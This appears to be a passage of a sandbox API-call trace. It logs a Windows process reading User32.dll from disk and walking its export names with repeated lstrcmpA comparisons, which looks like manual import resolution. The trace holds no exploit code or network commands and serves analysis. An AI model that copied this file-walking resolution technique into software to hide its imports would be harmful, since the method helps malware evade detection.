1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0263.653] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0263.654] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0263.654] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0263.654] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0263.654] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0263.813] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0263.813] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0263.813] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0263.828] GetProcessHeap () returned 0x4a0000 [0263.828] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d95030 | out: hHeap=0x4a0000) returned 1 [0263.828] GetProcessHeap () returned 0x4a0000 [0263.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9040 [0263.828] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0263.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0263.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0263.830] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0263.830] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0263.831] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0263.831] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0263.831] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0263.831] GetProcessHeap () returned 0x4a0000 [0263.831] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1555b8) returned 0x415f040 [0263.835] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0263.835] ReadFile (in: hFile=0x17c, lpBuffer=0x415f040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x415f040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0263.959] CloseHandle (hObject=0x17c) returned 1 [0263.960] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0263.960] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0263.960] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0263.960] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0263.960] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0263.960] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0263.960] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0263.960] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0263.960] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0263.960] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0263.960] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0263.960] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0263.960] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0263.960] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0263.961] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0263.961] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0263.961] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0263.961] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0263.961] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0263.961] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0263.961] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0263.961] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0263.961] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0263.961] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0263.961] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0263.961] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0263.961] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0263.961] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0263.961] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0263.961] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0263.961] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0263.961] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0263.961] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0263.961] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0263.961] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0263.962] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0263.962] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0263.962] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0263.962] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0263.962] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0263.962] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0263.962] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0263.962] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0263.962] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0263.962] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0263.962] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0263.962] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0263.963] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0263.963] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0263.963] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0263.963] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0263.963] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0263.963] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0263.963] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0263.963] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0263.963] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0263.963] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0263.963] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0263.963] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0263.963] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0263.963] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0263.963] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0263.964] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0263.964] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0263.964] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0263.964] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0263.964] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0263.964] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0263.964] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0263.964] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0263.964] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0263.965] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0263.965] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0263.965] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0263.965] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0263.965] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0263.965] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0263.965] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0263.966] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0263.966] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0263.967] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0263.968] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0263.969] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0263.970] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0264.320] GetProcessHeap () returned 0x4a0000 [0264.320] HeapFree 